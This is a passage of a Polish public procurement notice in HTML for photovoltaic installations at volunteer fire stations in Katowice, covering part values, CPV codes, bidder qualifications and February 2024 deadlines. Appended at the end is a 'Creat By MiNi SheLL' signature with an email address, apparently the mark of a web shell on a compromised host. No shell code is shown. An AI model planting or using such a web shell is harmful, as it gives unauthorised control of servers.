oraz audytami - Załącznik nr 4 do SWZ, <br/> 2) obmiary robót, odpowiednio dla każdej części - Załącznik nr 5 do SWZ,<br/> 3) projektowane postanowienia umowy – Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1776259,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta według kryteriów określonych w SWZ (Rozdział<br/>XVIII &#34;Opis kryteriów oceny ofert i sposobu oceny ofert&#34;)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznej dla budynków Ochotniczej Straży Pożarnej na terenie miasta Katowice. Zamówienie realizowane jest w ramach Programu &#34;EKO REMIZA&#34; finansowanego ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach. <br/>Część 5 – OSP Zarzecze ul. Grota Roweckiego 20A obejmuje w szczególności:<br/> 1) montaż konstrukcji wsporczej dla modułów fotowoltaicznych; <br/> 2) montaż modułów fotowoltaicznych (25 paneli o mocy 410 Wp każdy);<br/> 3) montaż falownika fotowoltaicznego i optymalizatorów mocy; <br/> 4) poprowadzenie tras kablowych strony AC i DC. <br/> 5) montaż zabezpieczeń strony AC i DC;<br/> 6) inne czynności niezbędne do prawidłowego i bezpiecznego funkcjonowania instalacji;<br/> 7) wykonanie testów i pomiarów końcowych; <br/> 8) przygotowanie wniosku o zgłoszenie mikroinstalacji do sieci Operatora Sieci Dystrybucyjnej;<br/> 9) wykonanie testowego uruchomienia instalacji fotowoltaicznej; <br/> 10) przeszkolenie przedstawicieli Zamawiającego w zakresie obsługi urządzeń niezbędnych do prawidłowego funkcjonowania instalacji fotowoltaicznej;<br/> 11) serwis gwarancyjny instalacji;<br/> 12) montaż tablicy pamiątkowej;<br/> 13) dwa przeglądy techniczne(roczny i trzyletni) wybudowanych instalacji w okresie gwarancji.<br/>UWAGA: Zamówienie obejmuje wzmocnienia konstrukcji dachowej zgodnie z opinią techniczną.<br/> 1. Zamawiający wymaga, by do montażu konstrukcji wsporczej dla modułów fotowoltaicznych Wykonawca zastosował rozwiązanie systemowe.<br/> 2. Zamawiający wymaga, by oprogramowanie kontrolno-sterujące wszystkich elementów instalacji miało licencję typu open.<br/> 3. Wymagany przez Zamawiającego okres gwarancji wynosi:<br/> 1) na panele fotowoltaiczne – 15 lat od daty odbioru końcowego przedmiotu umowy , <br/> 3) na inwertery – 10 lat od daty odbioru końcowego przedmiotu umowy, <br/> 5) na pozostałe elementy, materiały , urządzenia i roboty instalacyjno-montażowe – 5 lat daty odbioru końcowego przedmiotu umowy. <br/><br/> Szczegółowy opis przedmiotu zamówienia dla każdej części określają dokumenty zamówienia, w tym:<br/> 1) Projekt techniczny z załącznikami, w tym między innymi Specyfikacją Techniczną Wykonania i Odbioru Robót oraz audytami - Załącznik nr 4 do SWZ, <br/> 2) obmiary robót, odpowiednio dla każdej części - Załącznik nr 5 do SWZ,<br/> 3) projektowane postanowienia umowy – Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 74258,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta według kryteriów określonych w SWZ (Rozdział<br/>XVIII &#34;Opis kryteriów oceny ofert i sposobu oceny ofert&#34;)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 2 ustawy w zakresie zdolności technicznej lub zawodowej, dla każdej części:<br/> 1) Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał należycie dostawę wraz z montażem minimum jednej instalacji fotowoltaicznej o mocy nie mniejszej niż 10 kWp,<br/> 2) Wykonawca musi wykazać, że do wykonania niniejszego zamówienia skieruje osobę posiadającą uprawnienia budowlane specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, która będzie sprawowała nadzór nad realizacją robót. <br/><br/>UWAGA! <br/> • W przypadku, gdy Wykonawca składa ofertę na więcej niż jedną część zamówienia musi dla każdej części wykazać inną dostawę wraz z montażem, z zastrzeżeniem, że w przypadku gdy Wykonawca składa ofertę na trzy lub więcej części Zamawiający dopuszcza, by dla wszystkich części wykazał trzy dostawy instalacji fotowoltaicznej wraz z montażem.<br/> • Zamawiający dopuszcza, aby ta sama osoba sprawowała nadzór w każdej z części zamówienia.<br/> • Osoby, które Wykonawca wykaże na potwierdzenie spełniania warunku udziału w postępowaniu muszą uczestniczyć w realizacji przedmiotu umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze.zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; ww. oświadczenie składa każdy z Wykonawców wspólnie składających ofertę;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/> 2. wykazu dostaw wykonanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem mocy instalacji, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie, że Wykonawca i/lub podmiot na którego zasoby powołuje się Wykonawca celem wykazania spełniania warunków udziału w postępowaniu nie podlega wykluczeniu w przypadkach określonych w art. 7 ust 1 ustawy PrzeciwAgrUkrainaU – Załączniki 2 i 2b do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania wobec wykonawców występujących wspólnie opisane są w Rozdziale IV SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian umowy, których charakter oraz warunki wprowadzania zmian są określone w projektowanych postanowieniach umowy w szczególności w § 17-20 projektowanych postanowień umowy stanowiących Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/kzgm_katowice na stronie dotyczącej odpowiedniego postępowania. 2. Oferta wraz z wymaganymi dokumentami muszą zostać podpisane kwalifikowanym podpisem elektronicznym, zaufanym lub osobistym.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-12 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com